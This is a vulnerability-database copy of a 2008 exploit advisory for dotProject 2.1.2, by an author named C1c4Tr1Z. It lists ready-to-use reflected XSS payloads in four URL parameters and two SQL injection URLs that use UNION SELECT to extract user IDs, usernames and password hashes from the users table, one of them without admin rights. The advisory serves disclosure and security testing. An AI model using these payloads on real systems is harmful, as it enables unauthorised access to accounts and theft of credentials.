Lucene search
K

dotproject-sqlxss.txt

🗓️ 29 Aug 2008 00:00:00Reported by C1c4Tr1ZType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

dotProject 2.1.2 (29/06/2008) application is vulnerable to SQL injection and Cross-Site Scripting (XSS) attacks, allowing unauthorized access to user information and potential execution of malicious scripts

Code
`#=======================================================================#  
.____ _________ ._.  
| | ______ _ __/ _____/ ____ ____| |  
| | / _ \ \/ \/ /\_____ \_/ __ \_/ ___\ |  
| |__( <_> ) / / \ ___/\ \___\|  
|_______ \____/ \/\_/ /_______ /\___ >\___ >_  
\/ \/ \/ \/\/  
(http://wwwlowsec.org)  
#========================================================================#  
Author: C1c4Tr1Z  
Date: 28/08/08  
Application: dotProject 2.1.2 (29/06/2008)  
Product WebSite: http://www.dotproject.net/  
  
(*) With some of this exploits you need an ADMIN/ANONYMOUS account  
(*) I think that this proyect might be vulnerable to Cross-Site Request Forgery  
  
#========================================================================#  
#=============================[XSS]======================================#  
  
POC:  
/index.php?m=tasks&inactive=toggle"><img/src/onerror=alert(0)>  
/index.php?m=calendar&a=day_view&date=20080828"><img/src/onerror=alert(0)>  
/index.php?m=public&a=calendar&dialog=1&callback=setCalendar"><img/src/onerror=alert(0)>  
/index.php?m=ticketsmith&type=My'><img/src/onerror=alert(0)>  
  
#========================================================================#  
#=============================[SQL]======================================#  
  
POC as "ADMIN":  
  
/index.php?m=admin&a=viewuser&user_id=1 AND 1=0 UNION SELECT 1,2,concat_ws(0x3a,user_id,user_username,user_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 FROM users  
  
POC as "ANONYMOUS" or other:  
  
/index.php?m=projects&tab=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user_id,user_username,user_password),14,15,16,17,18,19,20,21,22 FROM users--  
  
#========================================================================#  
#========================================================================#  
Contact: C1c4Tr1Z <[email protected]>  
(http://wwwlowsec.org)  
LowSec! Web Application Security (Lab).  
Deus ex Machina  
#========================================================================#  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Aug 2008 00:00Current
7.4High risk
Vulners AI Score7.4
26